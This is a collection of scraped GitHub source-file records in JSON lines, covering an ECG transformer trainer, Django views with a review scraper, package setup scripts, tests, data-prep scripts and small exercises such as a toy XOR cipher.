')\n assert self.logger is None\n self.logger = get_logger(f'{self.name} Eval')\n self.model.eval()\n for inputs in dl:\n if torch.cuda.is_available():\n inputs = {k: v.cuda() for k, v in inputs.items()}\n with torch.no_grad():\n output = self.model(**inputs)\n loss = output.loss.detach().cpu()\n if reduce:\n loss_log = loss = loss.item()\n else:\n loss = loss.mean(dim=-1)\n loss_log = loss.mean().item()\n lst_loss.append(loss)\n lst_logits.append(output.logits.detach().cpu())\n lst_labels.append(inputs['labels'].cpu())\n if not training:\n dl.set_postfix(loss=loss_log)\n\n if reduce:\n loss_log = loss_ret = np.mean(lst_loss)\n else:\n loss_ret = torch.cat(lst_loss).numpy()\n loss_log = np.mean(loss_ret)\n logits, labels = torch.cat(lst_logits, dim=0), torch.cat(lst_labels, dim=0)\n preds_prob = torch.sigmoid(logits)\n d_log = dict(epoch=self.epoch, step=self.step) if training else dict()\n d_update = {**dict(loss=loss_log), **train_util.get_accuracy(preds_prob, labels)}\n d_log.update({f'eval/{k}': v for k, v in d_update.items()})\n self.log(d_log)\n d_log['eval/loss'] = loss_ret\n if not training:\n self.logger = None\n self.model.loss_reduction = red_ori\n return dict(metrics=d_log, predictions=dict(labels=labels, logits=logits)) if return_predictions else d_log\n\n def log(self, msg: Dict):\n msg_ = train_util.pretty_log_dict(msg, ref=self.train_meta)\n should_log = True\n # eval always logged\n if self.args['log_per_epoch'] and self.model.training and msg['step'] % self.args['steps_per_epoch'] != 0:\n should_log = False\n if self.args['log_to_console'] and should_log:\n self.logger.info(log_dict(msg_))\n if self.logger_fl:\n self.logger_fl.info(log_dict_nc(msg_))\n msg = {k: v for k, v in msg.items() if MyTrainer._keep_in_tb_write(k, v)}\n if self.tb_writer:\n for k, v in msg.items():\n self.tb_writer.add_scalar(tag=k, scalar_value=v, global_step=self.step)\n\n @staticmethod\n def _keep_in_tb_write(k: str, v: Any) -> bool:\n return not any(key in k for key in MyTrainer.tb_ignore_keys) and bool(v)\n\n def _get_lr(self) -> float:\n return self.scheduler.get_last_lr()[0]\n\n def _get_epoch_desc(self) -> str:\n n_ep_str = train_util.pretty_single('epoch', self.epoch, {'#epoch': self.args['num_train_epoch']})\n return f'Epoch {n_ep_str.strip()}'\n\n\ndef get_train_args(args: Dict = None, n_train: int = None) -> Dict:\n default_args = dict(\n num_train_epoch=3,\n train_batch_size=64,\n eval_batch_size=64,\n do_eval=True,\n optimizer='AdamW', # 'Adam' as in ViT doesn't work well, only learns meaningful with real small decay\n learning_rate=3e-4,\n weight_decay=1e-2, # decay of 1e-1 as in ViT is too harsh for our case, maybe due to 4096 batch size in ViT?\n warmup_ratio=0.05,\n schedule='cosine',\n n_sample=None,\n augment_timeout=False,\n patience=8,\n precision=16 if torch.cuda.is_available() else 'bf16',\n log_per_epoch=False, # only epoch-wise evaluation is logged\n log_to_console=True,\n save_every_n_epoch=False, # only save in the end\n save_top_k=-1, # save all models\n tqdm=False\n )\n args_ = default_args\n if args is not None:\n args_.update(args)\n # TODO: gradient accumulation not supported\n # see `get_all_setup` for PL\n args_['steps_per_epoch'] = steps_per_epoch = math.ceil((n_train or int(sys.maxsize)) // args_['train_batch_size'])\n args_['n_step'] = steps_per_epoch * args_['num_train_epoch']\n ca(optimizer=args_['optimizer'], schedule=args_['schedule'])\n return args_\n\n\ndef get_all_setup(\n model_name: str = 'ecg-vit', model_size: str = 'small', train_args: Dict = None,\n 
ptbxl_type: str = 'denoised', with_pl: bool = False\n) -> Tuple[nn.Module, MyPlTrainer]:\n assert model_name == 'ecg-vit'\n conf = EcgVitConfig.from_defined(f'{model_name}-{model_size}')\n model = EcgVit(config=conf)\n\n trainer_args = dict(model=model)\n if with_pl:\n raise NotImplementedError('PL not updated with TimeOut')\n dummy_train_args = get_train_args(train_args) # kind of ugly\n dnm = 'PTB-XL'\n pad = transform.TimeEndPad(conf.patch_size, pad_kwargs=dict(mode='constant', constant_values=0)) # zero-padding\n stats = config(f'datasets.{dnm}.train-stats.{ptbxl_type}')\n dset_args = dict(type=ptbxl_type, normalize=stats, transform=pad, return_type='pt')\n trainer_args['data_module'] = data_module = PtbxlDataModule(dataset_args=dset_args, train_args=dummy_train_args)\n n_train = len(data_module.train_dataloader())\n trainer_args['train_args'] = get_train_args(train_args, n_train=n_train)\n cls = MyPlTrainer\n else:\n timeout = train_args.get('augment_timeout', False) # TODO: kinda ugly, defined again in `get_train_args`\n args = dict(type=ptbxl_type, n_sample=train_args['n_sample'], std_norm=True, pad=conf.patch_size, timeout=timeout)\n tr, vl, ts = get_ptbxl_dataset(**args)\n # tr, vl, ts = get_ptbxl_splits(n_sample=train_args['n_sample'], dataset_args=dset_args)\n n_train = len(tr)\n trainer_args['train_dataset'], trainer_args['eval_dataset'] = tr, vl\n trainer_args['args'] = get_train_args(train_args, n_train=n_train)\n cls = MyTrainer\n return model, cls(**trainer_args)\n\n\nif __name__ == '__main__':\n from pytorch_lightning.utilities.seed import seed_everything\n # import transformers\n\n from icecream import ic\n\n lw = 1024\n ic.lineWrapWidth = lw\n np.set_printoptions(linewidth=lw)\n torch.set_printoptions(linewidth=lw)\n\n seed_everything(config('random-seed'))\n # transformers.set_seed(config('random-seed'))\n\n def train():\n model_size = 'debug'\n # model_size = 'tiny'\n t = 'original'\n\n n_sample = 64\n # n_sample = 128\n # n_sample = 512\n # bsz = 8\n bsz = 4\n num_train_epoch = 16\n with_pl = False\n\n train_args = dict(\n num_train_epoch=num_train_epoch,\n train_batch_size=bsz,\n eval_batch_size=bsz,\n # learning_rate=1e-3,\n learning_rate=3e-4,\n # weight_decay=1e-4,\n weight_decay=1e-2,\n # warmup_ratio=0.1,\n warmup_ratio=0,\n schedule='constant',\n n_sample=n_sample,\n augment_timeout=True,\n # precision=16 if torch.cuda.is_available() else 32,\n # do_eval=False,\n log_per_epoch=True,\n # log_to_console=False,\n save_every_n_epoch=8,\n save_top_k=2,\n tqdm=True\n )\n model, trainer = get_all_setup(model_size=model_size, train_args=train_args, ptbxl_type=t, with_pl=with_pl)\n trainer.train()\n train()\n # profile_runtime(train)\n\n def fix_check_trained_why_auc_low():\n model_key = 'ecg-vit-base'\n conf = EcgVitConfig.from_defined(model_key)\n model = EcgVit(config=conf)\n model = EcgVitTrainModule(model=model)\n\n checkpoint_path = os.path.join(\n PATH_BASE, DIR_PROJ, DIR_MDL,\n '2022-04-14_14-59-52', 'checkpoints', 'checkpoint-epochepoch=08, eval-loss=eval', 'loss=0.13.ckpt'\n )\n ckpt = torch.load(checkpoint_path, map_location='cpu')\n # ic(type(ckpt), ckpt.keys())\n # ic(ckpt['state_dict'].keys())\n model.load_state_dict(ckpt['state_dict'], strict=True) # Need the pl wrapper cos that's how the model is saved\n model.eval()\n # ic(model)\n\n t = 'original'\n dnm = 'PTB-XL'\n pad = transform.TimeEndPad(conf.patch_size, pad_kwargs=dict(mode='constant', constant_values=0)) # zero-padding\n stats = config(f'datasets.{dnm}.train-stats.{t}')\n dset_args = 
dict(type=t, normalize=stats, transform=pad, return_type='pt')\n tr, vl, ts = get_ptbxl_splits(n_sample=1024, dataset_args=dset_args)\n # dl = DataLoader(tr, batch_size=4)\n dl = DataLoader(vl, batch_size=4)\n for inputs in dl:\n sample_values = inputs['sample_values']\n ic(sample_values.shape, sample_values[:, 0, :20])\n with torch.no_grad():\n outputs = model(**inputs)\n # ic(outputs)\n loss, logits, labels = outputs.loss, outputs.logits, inputs['labels']\n ic(logits)\n ic(train_util.get_accuracy(torch.sigmoid(logits), labels, return_auc=True))\n exit(1)\n # fix_check_trained_why_auc_low()\n\n def fix_check_why_logits_all_same():\n conf = EcgVitConfig.from_defined('ecg-vit-debug')\n conf.patch_size = 32 # half of the defined\n model = EcgVit(config=conf)\n\n t = 'original'\n dnm = 'PTB-XL'\n pad = transform.TimeEndPad(conf.patch_size, pad_kwargs=dict(mode='constant', constant_values=0)) # zero-padding\n stats = config(f'datasets.{dnm}.train-stats.{t}')\n dset_args = dict(type=t, normalize=stats, transform=pad, return_type='pt')\n n = 128\n bsz = 32\n tr, vl, ts = get_ptbxl_splits(n_sample=n, dataset_args=dset_args)\n dl = DataLoader(vl, batch_size=bsz, shuffle=True)\n\n # lr = 3e-4\n lr = 1e-3\n optimizer = torch.optim.AdamW(model.parameters(), lr=lr, weight_decay=0)\n for n_ep in range(32):\n model.train() # cos at the end of each eval, evaluate\n for inputs in dl:\n # inputs['sample_values'] = inputs['sample_values'][:, :, :80]\n optimizer.zero_grad()\n\n sample_values, labels = inputs['sample_values'], inputs['labels']\n outputs = model(**inputs)\n loss, logits = outputs.loss, outputs.logits.detach()\n\n msk_2_class = torch.any(~labels.eq(labels[0]), dim=0)\n preds_prob = torch.sigmoid(logits)\n bin_preds = preds_prob > 0.5\n # matched = bin_preds.eq(labels)\n # acc = matched.sum().item() / matched.numel()\n # ic(sample_values[:, 0, :4], labels, logits, acc)\n d_metric = train_util.get_accuracy(preds_prob, labels)\n acc, auc = d_metric['binary_accuracy'], d_metric['macro_auc']\n ic(\n preds_prob[:, msk_2_class], bin_preds[:, msk_2_class], labels[:, msk_2_class], acc, auc,\n bin_preds.sum().item(),\n # (~matched).nonzero(),\n )\n\n loss.backward()\n nn.utils.clip_grad_norm_(model.parameters(), max_norm=1.0, error_if_nonfinite=True)\n optimizer.step()\n # scheduler.step()\n # fix_check_why_logits_all_same()\n # profile_runtime(fix_check_why_logits_all_same)\n","repo_name":"StefanHeng/ECG-Representation-Learning","sub_path":"ecg_transformer/models/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":28341,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"19"} +{"seq_id":"7111666266","text":"from threading import Thread\n\na = 999\n\n\ndef task():\n global a\n a = 666\n print('线 %s' % a)\n\n\nif __name__ == '__main__':\n t = Thread(target=task)\n t.start()\n t.join()\n print('主 %s' % a)\n\n\"\"\" ===>> \n线 666\n主 666\n\"\"\"","repo_name":"wangwenjei/python-demo","sub_path":"Python笔记/10.并发编程/02.线程/03.模拟同一进程下多线程间数据共享.py","file_name":"03.模拟同一进程下多线程间数据共享.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"4036463813","text":"import os\n# read the contents of your README file\nfrom pathlib import Path\n\nfrom setuptools import setup\n\nthis_directory = Path(__file__).parent\nlong_description = (this_directory / \"README.md\").read_text()\n\nif os.path.exists(\"version.txt\"):\n VERSION = (this_directory / 
\"version.txt\").read_text().strip()\nelse:\n VERSION = \"0.0.0.dev0\"\n\nREQUIREMENTS = [\n \"pydantic >= 1.9.2, <2.0.0\",\n \"requests >=2.28.0, <3.0.0\",\n \"Pillow >=9.1.1, <11.0.0\"\n]\n\nDOCS_REQUIREMENTS = [\n \"mkdocs >=1.4.0, <2.0.0\",\n \"mkdocs-material >=8.0.0, <9.0.0\",\n \"mkdocstrings-python >=0.7.0, <1.0.0\",\n \"griffe >=0.25.2, <1.0.0\",\n \"mkdocs-awesome-pages-plugin >=2.8.0, <3.0.0\"\n]\n\nDEV_REQUIREMENTS = [\n \"autopep8 >=1.6.0, <2.0.0\",\n \"isort >=5.10.1, <6.0.0\",\n \"flake8 >=4.0.1, <5.0.0\",\n \"flake8-docstrings >=1.6.0, <2.0.0\",\n \"flake8-isort >=4.1.1, <5.0.0\",\n \"tox >=3.25.0, <4.0.0\",\n \"Pillow >=9.1.1, <11.0.0\",\n \"deepdiff >=6.2.2, <7.0.0\",\n \"datamodel-code-generator >=0.17.1, <1.0.0\"\n]\n\n# Setting up\nsetup(\n name=\"iiif-prezi3\",\n version=VERSION,\n author=\"IIIF Prezi3 Team\",\n description=\"IIIF Presentation v3 API implementation\",\n long_description=long_description,\n long_description_content_type='text/markdown',\n packages=['iiif_prezi3', 'iiif_prezi3.helpers', 'iiif_prezi3.extensions', 'iiif_prezi3.config'],\n package_data={\n 'iiif_prezi3': ['config/extensions.json']\n },\n classifiers=[\"Development Status :: 5 - Production/Stable\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Operating System :: OS Independent\", # is this true? know Linux & OS X ok\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Programming Language :: Python :: 3.10\",\n \"Programming Language :: Python :: 3.11\",\n \"Topic :: Internet :: WWW/HTTP\",\n \"Topic :: Multimedia :: Graphics :: Graphics Conversion\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n \"Environment :: Web Environment\"],\n python_requires='>=3',\n url='https://github.com/iiif-prezi/iiif-prezi3',\n license='Apache License, Version 2.0',\n install_requires=REQUIREMENTS,\n extras_require={\n \"docs\": DOCS_REQUIREMENTS,\n \"dev\": DEV_REQUIREMENTS,\n },\n)\n","repo_name":"iiif-prezi/iiif-prezi3","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"19"} +{"seq_id":"12280848441","text":"from django.shortcuts import render, redirect\nfrom .forms import ContactusForm\nfrom .models import Faq, FaqServices, HappyCutomer, HeroImage, Newsletter\nfrom tour.models import Tour , Promotion\nfrom accounts.models import Contact\nfrom django.contrib import messages\nfrom django.core.mail import send_mail\nfrom outbounds.models import Otour\n\nfrom django.core.paginator import EmptyPage, PageNotAnInteger, Paginator\n\nfrom django.db.models import Q\nfrom tour.models import ReviewRating\nfrom tour.forms import ReviewForm\nfrom django.core.mail import EmailMessage\nfrom django.template.loader import render_to_string\nfrom django.conf import settings\nimport time\nimport requests\nfrom bs4 import BeautifulSoup\nimport logging\nfrom random import choice\n\nfrom selenium import webdriver\n# Create your views here.\n\n\ndef front(request):\n hero_images = HeroImage.objects.all()\n random_hero_image = choice(hero_images) if hero_images else None\n \n tours = Tour.objects.all()\n discount = Promotion.objects.all\n total_tours = tours.count()\n happy_customer = HappyCutomer.objects.all()\n\n\n context = {'tours': tours , 'discount': 
discount, 'total_tours':total_tours, 'happy_customer':happy_customer, 'random_hero_image': random_hero_image}\n return render(request, \"frontend/home.html\", context)\n\n\n\ndef gallery(request):\n \n context = {}\n return render(request, 'frontend/gallery.html' , context)\n \n \n \ndef contactUs(request):\n\n if request.method==\"POST\":\n form=ContactusForm(request.POST)\n if form.is_valid():\n messages.success(request, 'Message sent successfully!')\n form.save()\n time.sleep(3)\n else:\n messages.info(request, 'Something Wrong! Please try again')\n \n \n form=ContactusForm()\n\n context = {'form': form}\n return render(request, \"frontend/contact.html\", context)\n\n\n\n\ndef aboutUs(request):\n\n \n context = {}\n return render(request, \"frontend/about.html\", context)\n\n\n\n\n\ndef faq(request):\n faq_services = FaqServices.objects.all()\n faqs = Faq.objects.all()\n context = {'faqs':faqs, 'faq_services':faq_services}\n return render(request, \"frontend/faqs.html\", context)\n\ndef privacyPage(request):\n \n context = {}\n return render(request, \"frontend/privacy-policy.html\", context)\n \n\n\n\n\n\ndef successPage(request):\n\n\n context = {}\n return render(request, 'frontend/success_page.html', context)\n\n\ndef handle404(request, exception):\n \n return render(request,'frontend/error.html', status=404)\n\ndef newsletter(request):\n if request.method == \"POST\":\n email = request.POST['email_newsletter_2']\n \n if Newsletter.objects.filter(email=email).exists() :\n messages.info(request, \"Email already registered\")\n else :\n newsletter = Newsletter(email=email)\n newsletter.save()\n messages.success(request, \"Thank you, Your Email has been successfully saved\")\n \n # send email to cutomer \n html_template = 'frontend/newsletter.html'\n subject = 'Thank you for subscribing!'\n html_message = render_to_string(html_template, {\n 'user': request.user,\n \n })\n recipient_list = [email]\n email_from = settings.EMAIL_HOST_USER\n message = EmailMessage(subject, html_message, email_from, recipient_list)\n message.content_subtype = \"html\"\n message.send()\n return redirect('home')\n\ndef cate_link(request):\n links = Tour.objects.all()\n return dict(links = links)\n\ndef error_404(request, exception):\n\n\n context = {}\n return render(request, 'frontend/404.html', context)\n\n\n\n\n\ndef search(request):\n if 'q' in request.GET:\n q = request.GET['q']\n tours= Tour.objects.order_by('-date_created').filter(Q(description__icontains=q) | Q(name__icontains=q))\n otours= Otour.objects.order_by('-date_created').filter(Q(description__icontains=q) | Q(name__icontains=q))\n \n \n else:\n tours=Tour.objects.all()\n otours=Otour.objects.all()\n context = {'tours':tours, 'otours':otours}\n return render(request, 'frontend/search.html', context)\n\n\n\nlogger = logging.getLogger(__name__)\n\ndef tripadvisor_reviews(request):\n options = webdriver.ChromeOptions()\n options.add_argument('headless')\n options.add_argument('user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36')\n driver = webdriver.Chrome(options=options)\n\n url = 'https://www.tripadvisor.com/Attraction_Review-g295424-d1416619-Reviews-Arabian_Nights_Tours_LLC-Dubai_Emirate_of_Dubai.html'\n driver.get(url)\n time.sleep(5)\n\n driver.execute_script('window.scrollTo(0, document.body.scrollHeight);')\n time.sleep(5)\n\n soup = BeautifulSoup(driver.page_source, 'lxml')\n reviews = []\n for review in soup.select('.review-container')[:10]:\n title = 
review.select_one('span.noQuotes').text\n rating = review.select_one('span.ui_bubble_rating')['class'][1].split('_')[-1]\n text = review.select_one('p.partial_entry').text\n reviews.append({\n 'title': title,\n 'rating': rating,\n 'text': text,\n })\n\n driver.quit()\n\n logger.debug(reviews)\n context = {'reviews': reviews}\n return render(request, 'frontend/tripadvisor_reviews.html', context)\n","repo_name":"qamar62/akt_2023","sub_path":"frontend/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73039969322","text":"import numpy as np\nimport pytest\n\nfrom napari._qt.widgets.qt_range_slider_popup import QRangeSliderPopup\n\ninitial = np.array([100, 400])\nrange_ = np.array([0, 500])\n\n\n@pytest.fixture\ndef popup(qtbot):\n popup = QRangeSliderPopup(\n horizontal=True,\n precision=2,\n initial_values=initial,\n data_range=range_,\n step_size=1,\n )\n qtbot.addWidget(popup)\n return popup\n\n\ndef test_range_slider_popup_labels(popup):\n \"\"\"make sure labels are correct\"\"\"\n assert float(popup.curmin_label.text()) == initial[0]\n assert float(popup.curmax_label.text()) == initial[1]\n assert np.all(popup.slider.range() == range_)\n\n\ndef test_range_slider_changes_labels(popup):\n \"\"\"make sure setting the slider updates the labels\"\"\"\n popup.slider.setValues((10, 20))\n assert float(popup.curmin_label.text()) == 10\n assert float(popup.curmax_label.text()) == 20\n\n\ndef test_labels_change_range_slider(popup):\n \"\"\"make sure setting the labels updates the slider\"\"\"\n popup.slider.setValues((10, 20))\n\n popup.curmin_label.setText('100')\n popup.curmax_label.setText('300')\n popup.curmin_label.editingFinished.emit()\n popup.curmax_label.editingFinished.emit()\n assert np.all(popup.slider.values() == (100, 300))\n","repo_name":"zzalscv2/napari","sub_path":"napari/_qt/widgets/_tests/test_qt_range_slider_popup.py","file_name":"test_qt_range_slider_popup.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"13509901370","text":"#\n# @lc app=leetcode.cn id=684 lang=python3\n#\n# [684] 冗余连接\n#\n\n# @lc code=start\nclass Solution:\n def findRedundantConnection(self, edges: List[List[int]]) -> List[int]:\n n = len(edges)\n fa = [i for i in range(n + 1)]\n\n def find(x: int) -> int:\n if x != fa[x]: fa[x] = find(fa[x])\n return fa[x]\n\n for a, b in edges:\n if find(a) != find(b):\n fa[find(a)] = find(b)\n else:\n return [a, b]\n\n return [0, 0]\n \n# @lc code=end\n\n","repo_name":"ZJH-hhh/something","sub_path":"力扣/.leetcode/684.冗余连接.py","file_name":"684.冗余连接.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"24259211308","text":"import argparse\nimport collections\nimport data_loader.data_loaders as module_data\nimport data_loader.processor as module_processor\nfrom parse_config import ConfigParser\nimport model.model as module_arch\nfrom pytorch_pretrained_bert.modeling import BertConfig\nfrom agent import Agent\n\n\n# ~/Projects/PycharmProjects/DeepLearning/NLP/Bert/BertESIM\n\ndef train(config):\n logger = config.get_logger('train')\n\n # setup data_loader instances\n processor = config.initialize(\n 'processor', module_processor, logger, config)\n\n data_loader = config.initialize(\n 'data_loader',\n module_data,\n processor.data_dir,\n 
mode=\"train\",\n debug=config.debug_mode)\n test_data_loader = config.initialize(\n 'data_loader',\n module_data,\n processor.data_dir,\n mode=\"test\",\n debug=config.debug_mode)\n\n if config.all:\n valid_data_loader = test_data_loader\n else:\n valid_data_loader = data_loader.split_validation()\n\n # build model architecture, then print to console\n if config.bert_config_path:\n bert_config = BertConfig(config.bert_config_path)\n model = config.initialize(\n 'arch',\n module_arch,\n config=bert_config,\n num_labels=processor.nums_label())\n else:\n model = config.initialize_bert_model(\n 'arch', module_arch, num_labels=processor.nums_label())\n\n logger.info(model)\n agent = Agent(model,\n config=config,\n data_loader=data_loader,\n valid_data_loader=valid_data_loader,\n test_data_loader=test_data_loader)\n\n agent.train()\n return agent.test()\n\n\nif __name__ == '__main__':\n args = argparse.ArgumentParser(description='PyTorch Template')\n args.add_argument('-c', '--config', default=\"ATEC_BERT/config.json\", type=str,\n help='config file path (default: None)')\n args.add_argument('-r', '--resume', default=None, type=str,\n help='path to latest checkpoint (default: None)')\n args.add_argument('-d', '--device', default=None, type=str,\n help='indices of GPUs to enable (default: all)')\n args.add_argument('-a', '--all', default=False, type=bool,\n help='all for training, test as validation')\n args.add_argument('-debug', '--debug', default=False, type=bool,\n help='debug')\n args.add_argument('-reset', '--reset', default=False, type=bool,\n help='debug')\n\n # custom cli options to modify configuration from default values given in\n # json file.\n CustomArgs = collections.namedtuple('CustomArgs', 'flags type target')\n options = [\n CustomArgs(['--lr', '--learning_rate'], type=float,\n target=('optimizer', 'args', 'lr')),\n CustomArgs(['--bs', '--batch_size'], type=int,\n target=('data_loader', 'args', 'batch_size')),\n CustomArgs(['--ep', '--epoch'], type=int, target=('trainer', 'epochs'))\n ]\n\n config = ConfigParser(args, options)\n # config = MockConfigParser()\n train(config)\n","repo_name":"MrXJC/pytorch-bert-template","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3158,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"19"} +{"seq_id":"19660744988","text":"## Import library for data handling\nimport pandas as pd\n\n## Read in two data frames \n## matchups - all of the matchup data, so we know which team played which and who won\n## fullData - the data for each team and their aggregate statistics\nmatchups = pd.read_csv('matchups.csv')\nfullData = pd.read_csv('fullData.csv')\n\n## Some dataframe handling\nmatchups = matchups.dropna()\nmatchups = matchups.reset_index()\n\n## Define a function to retrieve a team's stats based on the year and team name\ndef getTeamStats(team, year): \n newDF = fullData[((fullData['Year'] == year) & (fullData['Team'] == team))]\n for index, row in newDF.iterrows():\n return list(row)\n\n## Test of the function\nprint(getTeamStats('iona', 2019))\n\n\n# newCols = ['RPI', 'Win%', 'CGWin%', 'SOS', 'Last 10', 'Margin', 'OffE', 'AdjO', 'DefE', 'AdjD', 'EffM', 'AdjEM', 'PF', 'PA', 'PFAM', 'TrueS%', 'OpTS%', 'TS%M', 'FG%', 'OpFG%', 'FG%M', '3P%', 'FT%', 'RB%', 'ST/Pos', 'TO/Pos', 'OpTO/Pos', 'TOM', 'BL%', 'PF/Pos']\n# statList = ['effective-field-goal-pct', 'ftm-per-100-possessions', 'offensive-rebounding-pct', 'defensive-rebounding-pct', 'assists-per-fgm', 
'effective-possession-ratio']\n# columnsToUse = ['Seed', 'Year', 'Team'] + statList\n# allCols = columnsToUse + newCols\n# allCols = allCols + allCols\n\n# regressionData = pd.DataFrame(columns = allCols)\n\n## Generating an empty list for collection purposes \nregressionData = []\n\n## Declaring variables outside of the loop to track progress of the loop\nfailureTotal = 0\nsuccessTotal = 0\ni = 0\n\n## Using the csv of teams and their stats (matchups and fullData) to produce data that is usable for a regression/other ML algorithm \n## the csv will have winning team and the losing team on the same line, with the result as its own column\n## For each row in matchups\nfor index, row in matchups.iterrows():\n ## Because of the way the data is formatted - every third row we are ready to read in a new matchup\n if i % 3 == 0: \n \n ## The first team is always the winner, so we grab that first\n year = int(row['Year'])\n winner = row['Team'].strip()\n winnerInfo = getTeamStats(winner, year)\n\n ## The next row will be the losing team\n nextRow = matchups.iloc[index + 1]\n\n loser = nextRow['Team'].strip()\n loserInfo = getTeamStats(loser, year) \n\n # Combining the data into one row and append it to our list of matchups\n try:\n totalData = winnerInfo + loserInfo \n regressionData.append(totalData)\n successTotal += 1\n except: \n failureTotal += 1\n print('failure', i, winner, loser, year)\n\n i += 1\n\n## Report the accuracy of this process - there may be some edge case failures\nprint(round(failureTotal / (failureTotal + successTotal), 4) * 100, '%')\n\n## Transform list of matchups into a dataframe, write it to a csv\nregressionDF = pd.DataFrame.from_records(regressionData)\nregressionDF.to_csv('regressionData.csv')\n\n\n## NOTE FOR THE END TO END PROCESS: \n## regressionData gets changed and manually cleaned to turn into regressionUseData \n\n\n","repo_name":"aks5bx/NCAA_Model_Comparisons","sub_path":"dataPrep.py","file_name":"dataPrep.py","file_ext":"py","file_size_in_byte":3112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"579805645","text":"from functions.preprocess import preprocess_data, preprocess_data_by_genres, preprocess_data_by_years\r\nfrom functions.visualize import visualize_songs\r\nfrom functions.clustering_genres import clustering_genre_projection\r\nfrom functions.clustering_music import clustering_music_projection\r\nfrom spotify.recommendations import recommend_id, recommend_music\r\n\r\nmusic_name = 'Ariana Grande - 7 rings'\r\n\r\ndata = preprocess_data('data/all_data.csv')\r\ndata_by_genres = preprocess_data_by_genres('data/data_by_genres.csv')\r\ndata_by_years = preprocess_data_by_years('data/data_by_years.csv')\r\n\r\nprojection, components, var_exp, projection_shape= clustering_genre_projection(data_by_genres)\r\nprojection_v2, components_v2, var_exp_v2, projection_shape_v2 = clustering_music_projection(data)\r\n\r\ndef analytics():\r\n print(f\"\\nGenre Data: \\nComponents = {components} \\nTotal explained variance = {round(var_exp * 100,3)}%\")\r\n print(f\"\\nMusic Data: \\nComponents = {components_v2} \\nTotal explained variance = {round(var_exp_v2 * 100,3)}% \\n\")\r\n\r\nif __name__ == \"__main__\":\r\n analytics()\r\n playlst_id = recommend_music(music_name, projection_v2, data)['id']\r\n name, url = recommend_id(playlst_id)\r\n visualize_songs(name, url) 
\r\n\r\n","repo_name":"christianduhp/music-recommendation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"15931342528","text":"# Handy for debugging setup.py\n\"\"\"Utilities creating reusable, DRY, setup.py installation scripts\n\n Typical usage in setup.py:\n >>> global_env, local_env = {}, {}\n >>> execfile(join('pug', 'setup_util.py'), global_env, local_env)\n >>> get_variable = local_env['get_variable']\n\"\"\"\nimport os\n\ndef setup(*args, **kwargs):\n print('setup() args = {0}'.format(args))\n print('setup() kwargs = {0}'.format(kwargs))\n\n\ndef get_variable(relpath, keyword='__version__'):\n \"\"\"Read __version__ or other properties from a python file without importing it \n \n from gist.github.com/technonik/406623 but with added keyward kwarg \"\"\"\n for line in open(os.path.join(os.path.dirname(__file__), relpath), encoding='cp437'):\n if keyword in line:\n if '\"' in line:\n return line.split('\"')[1]\n elif \"'\" in line:\n return line.split(\"'\")[1]","repo_name":"hobson/pug","sub_path":"pug/setup_util.py","file_name":"setup_util.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"19"} +{"seq_id":"36929329202","text":"import sys\nsys.path.append('D:\\\\git\\\\RDES')\nimport RDES as rd\nimport argparse\n\ndef main():\n path=parse_arguments().path\n text=rd.read_txt(path)\n print(text)\n s=rd.chr_to_bin(text)\n x10=int(rd.gpsc(rd.min_key),2)\n x20=1\n a=7\n b=13\n res=algoritm(s, x10, x20, a, b, 'key.txt')\n \ndef algoritm(text,x10,x20,a,b, path):\n j=0\n txt_file = open(path, \"w\")\n txt_file.write(str(x10)+\"\\n\")\n txt_file.write(str(x20)+\"\\n\")\n txt_file.write(str(a)+\"\\n\")\n txt_file.write(str(b)+\"\\n\")\n txt_file.close()\n result_text=''\n while j<(len(text)/64):\n text64=text[j*64:64*(j+1)]\n i=0\n tmp='{0:b}'.format(x10)\n while len(tmp)<64:\n tmp='0'+tmp\n res64=''\n while i<64:\n if text64[i]==tmp[i]:\n res64+='0'\n else:\n res64+='1'\n i+=1\n result_text+=res64\n x10=x10*a+x20*b\n j+=1\n rd.write_txt(result_text, 'res.txt')\n return(result_text)\n\ndef parse_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('path', type=str)\n args = parser.parse_args()\n return args\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"Gajuli/kursach","sub_path":"gamma.py","file_name":"gamma.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"27259099306","text":"import pandas as pd \nimport matplotlib as mlp\nimport matplotlib.pyplot as plt\nimport matplotlib.font_manager as fm\nimport os\n\nmlp.rcParams['axes.unicode_minus'] = False\npath = 'C:\\\\Users\\lane\\Anaconda3\\Lib\\site-packages\\matplotlib\\mpl-data\\fonts\\ttf\\batang.ttc'\nfontprop = fm.FontProperties(fname=path, size=18)\n\nplt.rcParams[\"font.family\"] = 